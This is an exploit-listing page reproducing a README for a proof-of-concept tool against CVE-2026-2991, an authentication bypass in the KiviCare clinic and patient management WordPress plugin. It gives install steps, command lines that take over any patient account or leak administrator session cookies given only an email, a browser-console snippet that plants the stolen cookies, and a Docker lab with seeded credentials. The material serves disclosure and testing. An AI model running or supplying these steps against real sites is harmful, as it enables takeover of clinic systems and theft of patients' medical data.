## https://sploitus.com/exploit?id=2A12F1C7-0C59-588B-9C6C-F6F214079DEF
KiviCare
## ๐ Description
CVE-2026-2991 is an authentication bypass vulnerability in the **KiviCare โ Clinic & Patient Management System (EHR)** WordPress plugin affecting all versions up to and including **4.1.2**.
The plugin exposes a public REST endpoint at `/wp-json/kivicare/v1/auth/patient/social-login` that authenticates users via social login. The `patientSocialLogin()` function accepts an email address and an access token but **never validates the token against the claimed social provider**. Any unauthenticated attacker can log in as any registered patient by supplying only their email and an arbitrary string as the token.
Additionally, WordPress authentication cookies are issued **before** the patient-role check is enforced. This means that for non-patient accounts (including administrators), the response returns HTTP 403 but still includes valid `Set-Cookie` headers โ leaking a replayable admin session to the attacker.
**Affected versions:** kivicare-clinic-management-system
## OSX/Linux
```bash
git clone https://github.com/joshuavanderpoll/CVE-2026-2991.git
cd CVE-2026-2991
python3 -m venv .venv
source .venv/bin/activate
pip3 install -r requirements.txt
```
## Windows
```bash
git clone https://github.com/joshuavanderpoll/CVE-2026-2991.git
cd CVE-2026-2991
python3 -m venv .venv
.venv\Scripts\activate
pip3 install -r requirements.txt
```
## โ๏ธ Usage
```
python3 CVE-2026-2991.py --url --email [--login-type ] [--timeout ] [--useragent ]
```
---
### Patient account takeover
Bypass authentication for a registered patient. The script returns their full session, including a nonce and replayable cookies.
```bash
python3 CVE-2026-2991.py --url 'https://target.com' --email 'patient@target.com'
```

---
### Admin session leak (non-patient account)
Supply the email of any non-patient user (e.g. an administrator). The endpoint issues valid auth cookies before the role check and returns 403 โ those cookies are extracted and printed.
```bash
python3 CVE-2026-2991.py --url http://localhost:8080/ --email 'admin@example.com'
```

---
### Browser console login
After a successful run the script prints a JavaScript snippet. Open the target site in your browser, paste the snippet into the browser console (`F12 โ Console`), and press Enter โ it sets the stolen cookies and navigates you to the dashboard automatically.
```js
(() => {
document.cookie = "wordpress_=; path=/";
document.cookie = "wordpress_logged_in_=; path=/";
window.location.href = "http://target.com/kivicare-patient-dashboard";
})();
```
## ๐ Docker PoC
A self-contained Docker Compose environment with the vulnerable plugin pre-installed and seeded with realistic test data.
Check [DOCKER.md](/docker/DOCKER.md) for more details.
```bash
cd docker/
docker compose up
```
The lab seeds the following accounts on first boot:
| Role | Username | Email | Password |
|-----------|-----------------|----------------------------------|--------------|
| Admin | admin | admin@example.com | admin |
| Doctor | dr.harris | dr.harris@greenfield.test | Doctor@123 |
| Doctor | dr.chen | dr.chen@greenfield.test | Doctor@123 |
| Doctor | dr.okonkwo | dr.okonkwo@greenfield.test | Doctor@123 |
| Patient | james.ford | james.ford@patients.test | Patient@123 |
| Patient | sofia.reyes | sofia.reyes@patients.test | Patient@123 |
| Patient | oliver.knight | oliver.knight@patients.test | Patient@123 |
| Patient | amara.diallo | amara.diallo@patients.test | Patient@123 |
| Patient | dan.walsh | dan.walsh@patients.test | Patient@123 |
```bash
# Bypass a patient
python3 CVE-2026-2991.py --url 'http://localhost:8080' --email 'sofia.reyes@patients.test'
# Leak admin session cookies
python3 CVE-2026-2991.py --url 'http://localhost:8080' --email 'admin@example.com'
```
## ๐ต๐ผ References
- [KiviCare โ WordPress Plugin](https://wordpress.org/plugins/kivicare-clinic-management-system/)
- [NVD โ CVE-2026-2991](https://nvd.nist.gov/vuln/detail/CVE-2026-2991)
- [WordFence](https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kivicare-clinic-management-system/)
- [HackIndex.io โ CVE-2026-2991](https://hackindex.io/vulnerabilities/CVE-2026-2991)
## ๐ข Disclaimer
This tool is provided for educational and research purposes only. The creator assumes no responsibility for any misuse or damage caused by this tool.